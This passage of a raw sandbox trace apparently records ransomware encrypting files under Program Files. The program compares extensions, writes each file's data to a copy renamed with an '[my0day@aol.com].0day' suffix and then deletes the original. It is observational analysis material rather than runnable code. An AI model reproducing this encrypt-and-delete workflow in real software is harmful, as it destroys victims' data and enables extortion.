-1 [0266.179] lstrlenW (lpString=".ppt") returned 4 [0266.179] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.179] lstrlenW (lpString=".zip") returned 4 [0266.179] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.179] lstrlenW (lpString=".rar") returned 4 [0266.179] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.179] lstrlenW (lpString=".bz2") returned 4 [0266.179] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.179] lstrlenW (lpString=".7z") returned 3 [0266.179] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.179] lstrlenW (lpString=".dbf") returned 4 [0266.179] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString=".1cd") returned 4 [0266.180] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString=".jpg") returned 4 [0266.180] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString=".doc") returned 4 [0266.180] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.180] lstrlenW (lpString=".docx") returned 5 [0266.180] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.180] lstrlenW (lpString=".pdf") returned 4 [0266.180] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.180] lstrlenW (lpString=".xls") returned 4 [0266.180] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.180] lstrlenW (lpString=".xlsx") returned 5 [0266.180] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.180] lstrlenW (lpString=".ppt") returned 4 [0266.180] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString=".zip") returned 4 [0266.180] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.180] lstrlenW (lpString=".rar") returned 4 [0266.180] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.180] lstrlenW (lpString=".bz2") returned 4 [0266.180] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.180] lstrlenW (lpString=".7z") returned 3 [0266.180] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString=".dbf") returned 4 [0266.180] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString=".1cd") returned 4 [0266.180] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0266.180] lstrlenW (lpString=".jpg") returned 4 [0266.181] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.181] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0266.181] lstrlenW (lpString="rtscom.dll.mui") returned 14 [0266.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.181] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=2560) returned 1 [0266.181] CloseHandle (hObject=0x300) returned 1 [0266.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui")) returned 0x20 [0266.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.181] lstrlenW (lpString=".doc") returned 4 [0266.181] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.181] lstrlenW (lpString=".docx") returned 5 [0266.181] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.181] lstrlenW (lpString=".pdf") returned 4 [0266.181] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.181] lstrlenW (lpString=".xls") returned 4 [0266.181] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.181] lstrlenW (lpString=".xlsx") returned 5 [0266.181] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.181] lstrlenW (lpString=".ppt") returned 4 [0266.181] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.181] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.181] lstrlenW (lpString=".zip") returned 4 [0266.182] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.182] lstrlenW (lpString=".rar") returned 4 [0266.182] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.182] lstrlenW (lpString=".bz2") returned 4 [0266.182] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.182] lstrlenW (lpString=".7z") returned 3 [0266.182] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.182] lstrlenW (lpString=".dbf") returned 4 [0266.182] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.182] lstrlenW (lpString=".1cd") returned 4 [0266.182] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.182] lstrlenW (lpString=".jpg") returned 4 [0266.182] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.182] lstrlenW (lpString=".doc") returned 4 [0266.182] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.182] lstrlenW (lpString=".docx") returned 5 [0266.182] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0266.182] lstrlenW (lpString=".pdf") returned 4 [0266.182] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.182] lstrlenW (lpString=".xls") returned 4 [0266.182] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.182] lstrlenW (lpString=".xlsx") returned 5 [0266.182] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0266.182] lstrlenW (lpString=".ppt") returned 4 [0266.182] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.182] lstrlenW (lpString=".zip") returned 4 [0266.182] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.182] lstrlenW (lpString=".rar") returned 4 [0266.182] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.182] lstrlenW (lpString=".bz2") returned 4 [0266.182] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.183] lstrlenW (lpString=".7z") returned 3 [0266.183] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.183] lstrlenW (lpString=".dbf") returned 4 [0266.183] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0266.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.183] lstrlenW (lpString=".1cd") returned 4 [0266.183] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0266.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 71 [0266.183] lstrlenW (lpString=".jpg") returned 4 [0266.183] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0266.183] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0266.183] lstrlenW (lpString="ShapeCollector.exe.mui") returned 22 [0266.183] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.183] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=43520) returned 1 [0266.183] CloseHandle (hObject=0x300) returned 1 [0266.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui")) returned 0x20 [0266.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.183] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0266.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0266.183] lstrlenW (lpString=".doc") returned 4 [0266.183] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.183] lstrlenW (lpString=".docx") returned 5 [0266.184] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.184] lstrlenW (lpString=".pdf") returned 4 [0266.184] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.184] lstrlenW (lpString=".xls") returned 4 [0266.184] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.184] lstrlenW (lpString=".xlsx") returned 5 [0266.184] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.184] lstrlenW (lpString=".ppt") returned 4 [0266.184] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 79 [0266.184] lstrlenW (lpString=".zip") returned 4 [0266.184] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.184] lstrlenW (lpString=".rar") returned 4 [0266.184] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.184] lstrlenW (lpString=".bz2") returned 4 [0266.184] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.184] lstrlenW (lpString=".7z") returned 3 [0266.184] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.191] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.200] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.422] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.422] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0268.422] GetLastError () returned 0x0 [0268.422] ReadFile (in: hFile=0x370, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x3a18, lpOverlapped=0x0) returned 1 [0268.550] WriteFile (in: hFile=0x32c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0268.551] ReadFile (in: hFile=0x370, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.551] WriteFile (in: hFile=0x32c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0268.551] SetEndOfFile (hFile=0x32c) returned 1 [0268.552] CloseHandle (hObject=0x32c) returned 1 [0268.552] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.552] SetEndOfFile (hFile=0x370) returned 1 [0268.556] CloseHandle (hObject=0x370) returned 1 [0268.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0268.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll")) returned 1 [0268.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.719] lstrlenW (lpString=".doc") returned 4 [0268.719] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString=".docx") returned 5 [0268.719] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1 [0268.719] lstrlenW (lpString=".pdf") returned 4 [0268.719] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString=".xls") returned 4 [0268.719] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0268.719] lstrlenW (lpString=".xlsx") returned 5 [0268.719] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1 [0268.719] lstrlenW (lpString=".ppt") returned 4 [0268.719] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.719] lstrlenW (lpString=".zip") returned 4 [0268.719] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0268.719] lstrlenW (lpString=".rar") returned 4 [0268.719] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString=".bz2") returned 4 [0268.719] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString=".7z") returned 3 [0268.719] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0268.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.719] lstrlenW (lpString=".dbf") returned 4 [0268.719] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.719] lstrlenW (lpString=".1cd") returned 4 [0268.719] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.719] lstrlenW (lpString=".jpg") returned 4 [0268.719] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0268.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.720] lstrlenW (lpString=".doc") returned 4 [0268.720] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0268.720] lstrlenW (lpString=".docx") returned 5 [0268.720] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1 [0268.720] lstrlenW (lpString=".pdf") returned 4 [0268.720] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0268.720] lstrlenW (lpString=".xls") returned 4 [0268.720] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0268.720] lstrlenW (lpString=".xlsx") returned 5 [0268.720] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1 [0268.720] lstrlenW (lpString=".ppt") returned 4 [0268.720] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0268.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.720] lstrlenW (lpString=".zip") returned 4 [0268.720] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0268.720] lstrlenW (lpString=".rar") returned 4 [0268.720] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0268.720] lstrlenW (lpString=".bz2") returned 4 [0268.720] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0268.720] lstrlenW (lpString=".7z") returned 3 [0268.720] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0268.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.720] lstrlenW (lpString=".dbf") returned 4 [0268.720] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0268.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.720] lstrlenW (lpString=".1cd") returned 4 [0268.720] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0268.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0268.720] lstrlenW (lpString=".jpg") returned 4 [0268.720] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0268.721] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0268.721] lstrlenW (lpString="CMNTY_01.MID") returned 12 [0268.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0269.410] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=6970) returned 1 [0269.410] CloseHandle (hObject=0x380) returned 1 [0269.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid")) returned 0x20 [0269.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.482] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.482] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.487] GetLastError () returned 0x0 [0269.487] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1b3a, lpOverlapped=0x0) returned 1 [0269.497] WriteFile (in: hFile=0x2cc, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1b40, lpOverlapped=0x0) returned 1 [0269.499] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.499] WriteFile (in: hFile=0x2cc, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.499] SetEndOfFile (hFile=0x2cc) returned 1 [0269.499] CloseHandle (hObject=0x2cc) returned 1 [0269.499] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.499] SetEndOfFile (hFile=0x354) returned 1 [0269.502] CloseHandle (hObject=0x354) returned 1 [0269.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.576] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid")) returned 1 [0269.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.576] lstrlenW (lpString=".doc") returned 4 [0269.576] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.576] lstrlenW (lpString=".docx") returned 5 [0269.576] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.576] lstrlenW (lpString=".pdf") returned 4 [0269.576] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.576] lstrlenW (lpString=".xls") returned 4 [0269.576] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.576] lstrlenW (lpString=".xlsx") returned 5 [0269.576] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.576] lstrlenW (lpString=".ppt") returned 4 [0269.576] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 63 [0269.576] lstrlenW (lpString=".zip") returned 4 [0269.576] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 